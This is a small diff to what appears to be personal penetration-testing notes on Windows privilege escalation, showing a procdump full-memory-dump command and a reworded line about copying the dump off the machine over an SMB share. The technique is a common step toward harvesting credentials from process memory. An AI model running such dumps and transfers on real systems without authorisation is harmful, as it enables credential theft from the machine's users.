AndreMIsidoro/escalations/windows_enumeration.md

 			.\procdump.exe -ma <process_id> <output_file>

-		We can use an smb share to download the output_file:
+		We can use an smb share to download the output_file in cmd:

 			on our local machine we do